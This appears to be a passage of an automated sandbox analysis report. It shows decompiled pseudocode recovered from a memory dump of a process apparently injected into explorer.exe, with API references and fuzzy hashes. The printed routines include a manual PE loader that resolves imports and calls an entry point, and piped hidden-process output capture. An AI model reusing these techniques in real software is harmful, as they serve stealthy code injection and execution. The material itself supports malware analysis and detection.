        			E000D21FF(char* __eax, char** _a4, long long* _a8) {
        				char* _v8;
        				long long _v16;
        				char* _t9;
        				signed char _t11;
        				char** _t19;
        				char _t22;
        				long long _t32;
        				long long _t33;
        
        				_t9 = __eax;
        				L000D22CD();
        				_t19 = _a4;
        				_t22 =  *__eax;
        				if( *_t22 != 0x2e) {
        					_t9 = strchr( *_t19, 0x2e);
        					if(_t9 != 0) {
        						 *_t9 =  *_t22;
        					}
        				}
        				L000D2291();
        				 *_t9 =  *_t9 & 0x00000000;
        				_t11 = strtod( *_t19,  &_v8);
        				asm("fst qword [ebp-0xc]");
        				_t32 =  *0xd8250;
        				asm("fucomp st1");
        				asm("fnstsw ax");
        				if((_t11 & 0x00000044) != 0) {
        					L5:
        					st0 = _t32;
        					L000D2291();
        					if( *_t11 != 0x22) {
        						_t33 = _v16;
        						goto L8;
        					} else {
        						return _t11 | 0xffffffff;
        					}
        				} else {
        					_t33 =  *0xd8258;
        					asm("fucomp st1");
        					asm("fnstsw ax");
        					if((_t11 & 0x00000044) != 0) {
        						L8:
        						 *_a8 = _t33;
        						return 0;
        					} else {
        						goto L5;
        					}
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: _errno$localeconvstrchrstrtod
        • String ID:
        • API String ID: 1035490122-0
        • Opcode ID: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction ID: 02ad6d30cf94f535e5970a8dc70227cda6efb6bc9110fd6e31c748a412764503
        • Opcode Fuzzy Hash: aceb4110dc66301c355acdaa5611ac5f99a5334a39e134f6b0ec4c9c9ba2d16c
        • Instruction Fuzzy Hash: A7012435804305FADB122F25E9026FD3BA4AFAA360F2041C2F980672A2CB358854DBB4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 73%
        			E000CA9B7(signed int __ecx) {
        				void* _v8;
        				void* _v12;
        				void* _v16;
        				void* _v20;
        				signed int _v24;
        				char _v28;
        				char _v32;
        				char _v36;
        				struct _SECURITY_ATTRIBUTES _v48;
        				intOrPtr _v60;
        				char _v64;
        				intOrPtr _v76;
        				intOrPtr _v80;
        				void* _v84;
        				short _v92;
        				intOrPtr _v96;
        				void _v140;
        				intOrPtr _t77;
        				void* _t79;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				intOrPtr _t92;
        				intOrPtr _t98;
        				intOrPtr _t100;
        				intOrPtr _t102;
        				long _t111;
        				intOrPtr _t115;
        				intOrPtr _t126;
        				void* _t127;
        				void* _t128;
        				void* _t129;
        				void* _t130;
        
        				_t111 = 0;
        				_v24 = __ecx;
        				_v12 = 0;
        				_v20 = 0;
        				_t127 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				_v48.nLength = 0xc;
        				_v48.lpSecurityDescriptor = 0;
        				_v48.bInheritHandle = 1;
        				_v28 = 0;
        				memset( &_v140, 0, 0x44);
        				asm("stosd");
        				_t130 = _t129 + 0xc;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
        					L18:
        					return 0;
        				}
        				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
        					L13:
        					E000C861A( &_v28, 0);
        					if(_v20 != 0) {
        						_t77 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t77 + 0x30))(_v20);
        					}
        					if(_v8 != 0) {
        						_t115 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t115 + 0x30))(_v8);
        					}
        					return _t111;
        				}
        				_t79 = _v16;
        				_v76 = _t79;
        				_v80 = _t79;
        				_v84 = _v12;
        				_v140 = 0x44;
        				_v96 = 0x101;
        				_v92 = 0;
        				_t126 = E000C8604(0x1001);
        				_v28 = _t126;
        				if(_t126 == 0) {
        					goto L18;
        				}
        				_push( &_v64);
        				_push( &_v140);
        				_t85 =  *0xde684; // 0x64f8f0
        				_push(0);
        				_push(0);
        				_push(0x8000000);
        				_push(1);
        				_push(0);
        				_push(0);
        				_push(_v24);
        				_push(0);
        				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
        					goto L13;
        				}
        				_t87 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t87 + 0x30))(_v12);
        				_t89 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t89 + 0x30))(_v16);
        				_v24 = _v24 & 0;
        				do {
        					_t92 =  *0xde684; // 0x64f8f0
        					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
        					 *((char*)(_v24 + _t126)) = 0;
        					if(_t111 == 0) {
        						_t127 = E000C91A6(_t126, 0);
        					} else {
        						_push(0);
        						_push(_t126);
        						_v32 = _t127;
        						_t127 = E000C9292(_t127);
        						E000C861A( &_v32, 0xffffffff);
        						_t130 = _t130 + 0x14;
        					}
        					_t111 = _t127;
        					_v32 = _t127;
        				} while (_v36 != 0);
        				_push( &_v36);
        				_push(E000CC379(_t127));
        				_t98 =  *0xde68c; // 0x64fab8
        				_push(_t127);
        				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
        					L12:
        					_t100 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t100 + 0x30))(_v64);
        					_t102 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t102 + 0x30))(_v60);
        					goto L13;
        				}
        				_t128 = E000C9256(_t127);
        				if(_t128 == 0) {
        					goto L12;
        				}
        				E000C861A( &_v32, 0);
        				return _t128;
        			}

        APIs
        • memset.MSVCRT ref: 000CA9F4
        • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 000CAA18
        • CreatePipe.KERNEL32(000C65A9,?,0000000C,00000000), ref: 000CAA2F
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateHeapPipe$AllocateFreememset
        • String ID: D
        • API String ID: 2365139273-2746444292
        • Opcode ID: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
        • Instruction ID: ee5a40d96a8d170e39ef4db7aa177635ee1e57970e24f23723ed2304e9932c98
        • Opcode Fuzzy Hash: a647d74f38189fc26be976d60fd895fc1f1cfc283b33b8330ee1ba72ca411e50
        • Instruction Fuzzy Hash: 69512972E00209AFEB51DFA4CC85FEEB7B9EB08304F10416AF504E7292DB749E048B65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000CC4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
        				char _v8;
        				char _v12;
        				void _v140;
        				signed char _t14;
        				char _t15;
        				intOrPtr _t20;
        				void* _t25;
        				intOrPtr _t26;
        				intOrPtr _t32;
        				WCHAR* _t34;
        				intOrPtr _t35;
        				struct HINSTANCE__* _t37;
        				int _t38;
        				intOrPtr _t46;
        				void* _t47;
        				intOrPtr _t50;
        				void* _t60;
        				void* _t61;
        				char _t62;
        				char* _t63;
        				void* _t65;
        				intOrPtr _t66;
        				char _t68;
        
        				_t65 = __esi;
        				_t61 = __edi;
        				_t47 = __ebx;
        				_t50 =  *0xde688; // 0xf0000
        				_t14 =  *(_t50 + 0x1898);
        				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
        					_t15 = E000C95E1(_t50, 0xb62);
        					_t66 =  *0xde688; // 0xf0000
        					_t62 = _t15;
        					_t67 = _t66 + 0xb0;
        					_v8 = _t62;
        					E000C9640( &_v140, 0x40, L"%08x", E000CD400(_t66 + 0xb0, E000CC379(_t66 + 0xb0), 0));
        					_t20 =  *0xde688; // 0xf0000
        					asm("sbb eax, eax");
        					_t25 = E000C95E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
        					_t63 = "\\";
        					_t26 =  *0xde688; // 0xf0000
        					_t68 = E000C92E5(_t26 + 0x1020);
        					_v12 = _t68;
        					E000C85D5( &_v8);
        					_t32 =  *0xde688; // 0xf0000
        					_t34 = E000C92E5(_t32 + 0x122a);
        					 *0xde784 = _t34;
        					_t35 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
        					_t37 = LoadLibraryW( *0xde784);
        					 *0xde77c = _t37;
        					if(_t37 == 0) {
        						_t38 = 0;
        					} else {
        						_push(_t37);
        						_t60 = 0x28;
        						_t38 = E000CE171(0xdbb48, _t60);
        					}
        					 *0xde780 = _t38;
        					E000C861A( &_v12, 0xfffffffe);
        					memset( &_v140, 0, 0x80);
        					if( *0xde780 != 0) {
        						goto L10;
        					} else {
        						E000C861A(0xde784, 0xfffffffe);
        						goto L8;
        					}
        				} else {
        					L8:
        					if( *0xde780 == 0) {
        						_t46 =  *0xde6bc; // 0x64fa18
        						 *0xde780 = _t46;
        					}
        					L10:
        					return 1;
        				}
        			}

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: LibraryLoadmemset
        • String ID: %08x$dll
        • API String ID: 3406617148-2963171978
        • Opcode ID: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
        • Instruction ID: 7bb140d26ea90620d688a4d55edfb562bb055213326fc88d9619b145c98fbc54
        • Opcode Fuzzy Hash: d882a4f1289e6b93c371471509f1584e5831a8cbed4e1e9e3ca582eae478a6de
        • Instruction Fuzzy Hash: A7319572A01244ABFB50AB64DC89F9E33ACEB54354F14402FF909DB292DB78D9458734
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 99%
        			E000D2D70(int _a4, signed int _a8) {
        				int _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				void* __esi;
        				void* _t137;
        				signed int _t141;
        				intOrPtr* _t142;
        				signed int _t145;
        				signed int _t146;
        				intOrPtr _t151;
        				intOrPtr _t161;
        				intOrPtr _t162;
        				intOrPtr _t167;
        				intOrPtr _t170;
        				signed int _t172;
        				intOrPtr _t173;
        				int _t184;
        				intOrPtr _t185;
        				intOrPtr _t188;
        				signed int _t189;
        				void* _t195;
        				int _t202;
        				int _t208;
        				intOrPtr _t217;
        				signed int _t218;
        				int _t219;
        				intOrPtr _t220;
        				signed int _t221;
        				signed int _t222;
        				int _t224;
        				int _t225;
        				signed int _t227;
        				intOrPtr _t228;
        				int _t232;
        				int _t234;
        				signed int _t235;
        				int _t239;
        				void* _t240;
        				int _t245;
        				int _t252;
        				signed int _t253;
        				int _t254;
        				void* _t257;
        				void* _t258;
        				int _t259;
        				intOrPtr _t260;
        				int _t261;
        				signed int _t269;
        				signed int _t271;
        				intOrPtr* _t272;
        				void* _t273;
        
        				_t253 = _a8;
        				_t272 = _a4;
        				_t3 = _t272 + 0xc; // 0x452bf84d
        				_t4 = _t272 + 0x2c; // 0x8df075ff
        				_t228 =  *_t4;
        				_t137 =  *_t3 + 0xfffffffb;
        				_t229 =  <=  ? _t137 : _t228;
        				_v16 =  <=  ? _t137 : _t228;
        				_t269 = 0;
        				_a4 =  *((intOrPtr*)( *_t272 + 4));
        				asm("o16 nop [eax+eax]");
        				while(1) {
        					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
        					_t141 =  *_t8 + 0x2a >> 3;
        					_v12 = 0xffff;
        					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
        					if(_t217 < _t141) {
        						break;
        					}
        					_t11 = _t272 + 0x6c; // 0xa1ec8b55
        					_t12 = _t272 + 0x5c; // 0x84e85000
        					_t245 =  *_t11 -  *_t12;
        					_v8 = _t245;
        					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
        					_t247 =  <  ? _t195 : _v12;
        					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
        					if(_t227 >= _v16) {
        						L7:
        						if(_t253 != 4) {
        							L10:
        							_t269 = 0;
        							__eflags = 0;
        						} else {
        							_t285 = _t227 - _t195;
        							if(_t227 != _t195) {
        								goto L10;
        							} else {
        								_t269 = _t253 - 3;
        							}
        						}
        						E000D5D90(_t272, _t272, 0, 0, _t269);
        						_t18 = _t272 + 0x14; // 0xc703f045
        						_t19 = _t272 + 8; // 0x8d000040
        						 *( *_t18 +  *_t19 - 4) = _t227;
        						_t22 = _t272 + 0x14; // 0xc703f045
        						_t23 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
        						_t26 = _t272 + 0x14; // 0xc703f045
        						_t27 = _t272 + 8; // 0x8d000040
        						 *( *_t26 +  *_t27 - 2) =  !_t227;
        						_t30 = _t272 + 0x14; // 0xc703f045
        						_t31 = _t272 + 8; // 0x8d000040
        						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
        						E000D4AF0(_t285,  *_t272);
        						_t202 = _v8;
        						_t273 = _t273 + 0x14;
        						if(_t202 != 0) {
        							_t208 =  >  ? _t227 : _t202;
        							_v8 = _t208;
        							_t36 = _t272 + 0x38; // 0xf47d8bff
        							_t37 = _t272 + 0x5c; // 0x84e85000
        							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
        							_t273 = _t273 + 0xc;
        							_t252 = _v8;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
        							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
        							_t227 = _t227 - _t252;
        						}
        						if(_t227 != 0) {
        							E000D4C30( *_t272,  *( *_t272 + 0xc), _t227);
        							_t273 = _t273 + 0xc;
        							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
        							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
        							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
        						}
        						_t253 = _a8;
        						if(_t269 == 0) {
        							continue;
        						}
        					} else {
        						if(_t227 != 0 || _t253 == 4) {
        							if(_t253 != 0 && _t227 == _t195) {
        								goto L7;
        							}
        						}
        					}
        					break;
        				}
        				_t142 =  *_t272;
        				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
        				_a4 = _t232;
        				if(_t232 == 0) {
        					_t83 = _t272 + 0x6c; // 0xa1ec8b55
        					_t254 =  *_t83;
        				} else {
        					_t59 = _t272 + 0x2c; // 0x8df075ff
        					_t224 =  *_t59;
        					if(_t232 < _t224) {
        						_t65 = _t272 + 0x3c; // 0x830cc483
        						_t66 = _t272 + 0x6c; // 0xa1ec8b55
        						_t260 =  *_t66;
        						__eflags =  *_t65 - _t260 - _t232;
        						if( *_t65 - _t260 <= _t232) {
        							_t67 = _t272 + 0x38; // 0xf47d8bff
        							_t261 = _t260 - _t224;
        							 *(_t272 + 0x6c) = _t261;
        							memcpy( *_t67,  *_t67 + _t224, _t261);
        							_t70 = _t272 + 0x16b0; // 0xdf750008
        							_t188 =  *_t70;
        							_t273 = _t273 + 0xc;
        							_t232 = _a4;
        							__eflags = _t188 - 2;
        							if(_t188 < 2) {
        								_t189 = _t188 + 1;
        								__eflags = _t189;
        								 *(_t272 + 0x16b0) = _t189;
        							}
        						}
        						_t73 = _t272 + 0x38; // 0xf47d8bff
        						_t74 = _t272 + 0x6c; // 0xa1ec8b55
        						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
        						_t225 = _a4;
        						_t273 = _t273 + 0xc;
        						_t76 = _t272 + 0x6c;
        						 *_t76 =  *(_t272 + 0x6c) + _t225;
        						__eflags =  *_t76;
        						_t78 = _t272 + 0x6c; // 0xa1ec8b55
        						_t184 =  *_t78;
        						_t79 = _t272 + 0x2c; // 0x8df075ff
        						_t239 =  *_t79;
        					} else {
        						 *(_t272 + 0x16b0) = 2;
        						_t61 = _t272 + 0x38; // 0xf47d8bff
        						memcpy( *_t61,  *_t142 - _t224, _t224);
        						_t62 = _t272 + 0x2c; // 0x8df075ff
        						_t184 =  *_t62;
        						_t273 = _t273 + 0xc;
        						_t225 = _a4;
        						_t239 = _t184;
        						 *(_t272 + 0x6c) = _t184;
        					}
        					_t254 = _t184;
        					 *(_t272 + 0x5c) = _t184;
        					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
        					_t185 =  *_t81;
        					_t240 = _t239 - _t185;
        					_t241 =  <=  ? _t225 : _t240;
        					_t242 = ( <=  ? _t225 : _t240) + _t185;
        					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
        				}
        				if( *(_t272 + 0x16c0) < _t254) {
        					 *(_t272 + 0x16c0) = _t254;
        				}
        				if(_t269 == 0) {
        					_t218 = _a8;
        					__eflags = _t218;
        					if(_t218 == 0) {
        						L34:
        						_t89 = _t272 + 0x3c; // 0x830cc483
        						_t219 =  *_t272;
        						_t145 =  *_t89 - _t254 - 1;
        						_a4 =  *_t272;
        						_t234 = _t254;
        						_v16 = _t145;
        						_v8 = _t254;
        						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
        						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
        							_v8 = _t254;
        							_t95 = _t272 + 0x5c; // 0x84e85000
        							_a4 = _t219;
        							_t234 = _t254;
        							_t97 = _t272 + 0x2c; // 0x8df075ff
        							__eflags =  *_t95 -  *_t97;
        							if( *_t95 >=  *_t97) {
        								_t98 = _t272 + 0x2c; // 0x8df075ff
        								_t167 =  *_t98;
        								_t259 = _t254 - _t167;
        								_t99 = _t272 + 0x38; // 0xf47d8bff
        								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
        								 *(_t272 + 0x6c) = _t259;
        								memcpy( *_t99, _t167 +  *_t99, _t259);
        								_t103 = _t272 + 0x16b0; // 0xdf750008
        								_t170 =  *_t103;
        								_t273 = _t273 + 0xc;
        								__eflags = _t170 - 2;
        								if(_t170 < 2) {
        									_t172 = _t170 + 1;
        									__eflags = _t172;
        									 *(_t272 + 0x16b0) = _t172;
        								}
        								_t106 = _t272 + 0x2c; // 0x8df075ff
        								_t145 = _v16 +  *_t106;
        								__eflags = _t145;
        								_a4 =  *_t272;
        								_t108 = _t272 + 0x6c; // 0xa1ec8b55
        								_t234 =  *_t108;
        								_v8 = _t234;
        							}
        						}
        						_t255 = _a4;
        						_t220 =  *((intOrPtr*)(_a4 + 4));
        						__eflags = _t145 - _t220;
        						_t221 =  <=  ? _t145 : _t220;
        						_t146 = _t221;
        						_a4 = _t221;
        						_t222 = _a8;
        						__eflags = _t146;
        						if(_t146 != 0) {
        							_t114 = _t272 + 0x38; // 0xf47d8bff
        							E000D4C30(_t255,  *_t114 + _v8, _t146);
        							_t273 = _t273 + 0xc;
        							_t117 = _t272 + 0x6c;
        							 *_t117 =  *(_t272 + 0x6c) + _a4;
        							__eflags =  *_t117;
        							_t119 = _t272 + 0x6c; // 0xa1ec8b55
        							_t234 =  *_t119;
        						}
        						__eflags =  *(_t272 + 0x16c0) - _t234;
        						if( *(_t272 + 0x16c0) < _t234) {
        							 *(_t272 + 0x16c0) = _t234;
        						}
        						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
        						_t123 = _t272 + 0xc; // 0x452bf84d
        						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
        						__eflags = _t257 - 0xffff;
        						_t258 =  >  ? 0xffff : _t257;
        						_t124 = _t272 + 0x2c; // 0x8df075ff
        						_t151 =  *_t124;
        						_t125 = _t272 + 0x5c; // 0x84e85000
        						_t235 = _t234 -  *_t125;
        						__eflags = _t258 - _t151;
        						_t152 =  <=  ? _t258 : _t151;
        						__eflags = _t235 - ( <=  ? _t258 : _t151);
        						if(_t235 >= ( <=  ? _t258 : _t151)) {
        							L49:
        							__eflags = _t235 - _t258;
        							_t154 =  >  ? _t258 : _t235;
        							_a4 =  >  ? _t258 : _t235;
        							__eflags = _t222 - 4;
        							if(_t222 != 4) {
        								L53:
        								_t269 = 0;
        								__eflags = 0;
        							} else {
        								_t161 =  *_t272;
        								__eflags =  *(_t161 + 4);
        								_t154 = _a4;
        								if( *(_t161 + 4) != 0) {
        									goto L53;
        								} else {
        									__eflags = _t154 - _t235;
        									if(_t154 != _t235) {
        										goto L53;
        									} else {
        										_t269 = _t222 - 3;
        									}
        								}
        							}
        							_t131 = _t272 + 0x38; // 0xf47d8bff
        							_t132 = _t272 + 0x5c; // 0x84e85000
        							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
        							_t134 = _t272 + 0x5c;
        							 *_t134 =  *(_t272 + 0x5c) + _a4;
        							__eflags =  *_t134;
        							E000D4AF0( *_t134,  *_t272);
        						} else {
        							__eflags = _t235;
        							if(_t235 != 0) {
        								L46:
        								__eflags = _t222;
        								if(_t222 != 0) {
        									_t162 =  *_t272;
        									__eflags =  *(_t162 + 4);
        									if( *(_t162 + 4) == 0) {
        										__eflags = _t235 - _t258;
        										if(_t235 <= _t258) {
        											goto L49;
        										}
        									}
        								}
        							} else {
        								__eflags = _t222 - 4;
        								if(_t222 == 4) {
        									goto L46;
        								}
        							}
        						}
        						asm("sbb edi, edi");
        						_t271 =  ~_t269 & 0x00000002;
        						__eflags = _t271;
        						return _t271;
        					} else {
        						__eflags = _t218 - 4;
        						if(_t218 == 4) {
        							goto L34;
        						} else {
        							_t173 =  *_t272;
        							__eflags =  *(_t173 + 4);
        							if( *(_t173 + 4) != 0) {
        								goto L34;
        							} else {
        								_t88 = _t272 + 0x5c; // 0x84e85000
        								__eflags = _t254 -  *_t88;
        								if(_t254 !=  *_t88) {
        									goto L34;
        								} else {
        									return 1;
        								}
        							}
        						}
        					}
        				} else {
        					return 3;
        				}
        			}

        APIs
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: memcpy
        • String ID:
        • API String ID: 3510742995-0
        • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
        • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
        • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 52%
        			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
        				signed int _v5;
        				signed short _v12;
        				intOrPtr* _v16;
        				signed int* _v20;
        				intOrPtr _v24;
        				unsigned int _v28;
        				signed short* _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr* _v40;
        				signed short* _v44;
        				intOrPtr _v48;
        				unsigned int _v52;
        				intOrPtr _v56;
        				_Unknown_base(*)()* _v60;
        				signed int _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				unsigned int _v76;
        				intOrPtr _v80;
        				signed int _v84;
        				intOrPtr _v88;
        				signed int _t149;
        				void* _t189;
        				signed int _t194;
        				signed int _t196;
        				intOrPtr _t236;
        
        				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        				_v24 = _v72;
        				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
        				_v56 = _t236;
        				if(_t236 == 0) {
        					L13:
        					while(0 != 0) {
        					}
        					_push(8);
        					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
        						L35:
        						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
        						while(0 != 0) {
        						}
        						if(_a12 != 0) {
        							 *_a12 = _v68;
        						}
        						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
        						return _v68(_a4, 1, _a8);
        					}
        					_v84 = 0x80000000;
        					_t149 = 8;
        					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						if(_v36 == 0) {
        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
        						}
        						if(_v36 != 0) {
        							if( *_v16 == 0) {
        								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
        							} else {
        								_v20 =  *_v16 + _a4;
        							}
        							_v64 = _v64 & 0x00000000;
        							while( *_v20 != 0) {
        								if(( *_v20 & _v84) == 0) {
        									_v88 =  *_v20 + _a4;
        									_v60 = GetProcAddress(_v36, _v88 + 2);
        								} else {
        									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
        								}
        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
        									 *_v20 = _v60;
        								} else {
        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
        								}
        								_v20 =  &(_v20[1]);
        								_v64 = _v64 + 4;
        							}
        							_v16 = _v16 + 0x14;
        							continue;
        						} else {
        							_t189 = 0xfffffffd;
        							return _t189;
        						}
        					}
        					goto L35;
        				}
        				_t194 = 8;
        				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
        				_t196 = 8;
        				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
        				while(0 != 0) {
        				}
        				while(_v48 > 0) {
        					_v28 = _v44[2];
        					_v48 = _v48 - _v28;
        					_v28 = _v28 - 8;
        					_v28 = _v28 >> 1;
        					_v32 =  &(_v44[4]);
        					_v80 = _a4 +  *_v44;
        					_v52 = _v28;
        					while(1) {
        						_v76 = _v52;
        						_v52 = _v52 - 1;
        						if(_v76 == 0) {
        							break;
        						}
        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
        						_v12 =  *_v32 & 0xfff;
        						_v40 = (_v12 & 0x0000ffff) + _v80;
        						if((_v5 & 0x000000ff) != 3) {
        							if((_v5 & 0x000000ff) == 0xa) {
        								 *_v40 =  *_v40 + _v56;
        							}
        						} else {
        							 *_v40 =  *_v40 + _v56;
        						}
        						_v32 =  &(_v32[1]);
        					}
        					_v44 = _v32;
        				}
        				goto L13;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
        • LoadLibraryA.KERNEL32(?), ref: 000D2C65
        • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
        • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressProc$HandleLibraryLoadModule
        • String ID:
        • API String ID: 384173800-0
        • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
        • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
        • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
        				char _v16;
        				intOrPtr _v20;
        				char _v24;
        				char _v28;
        				void* _t13;
        				intOrPtr _t15;
        				signed int _t16;
        				intOrPtr _t17;
        				signed int _t18;
        				char _t20;
        				intOrPtr _t22;
        				void* _t23;
        				void* _t24;
        				intOrPtr _t29;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t48;
        				void* _t51;
        				signed int _t61;
        				signed int _t64;
        				void* _t71;
        
        				_t71 = __fp0;
        				_t61 = __ecx;
        				_t41 =  *0xde6dc; // 0x1d8
        				_t13 = E000CA4BF(_t41, 0);
        				while(_t13 < 0) {
        					E000C980C( &_v28);
        					_t43 =  *0xde6e0; // 0x0
        					_t15 =  *0xde6e4; // 0x0
        					_t41 = _t43 + 0xe10;
        					asm("adc eax, ebx");
        					__eflags = _t15 - _v24;
        					if(__eflags > 0) {
        						L9:
        						_t16 = 0xfffffffe;
        						L13:
        						return _t16;
        					}
        					if(__eflags < 0) {
        						L4:
        						_t17 =  *0xde684; // 0x64f8f0
        						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
        						__eflags = _t18;
        						if(_t18 == 0) {
        							break;
        						}
        						_t35 =  *0xde684; // 0x64f8f0
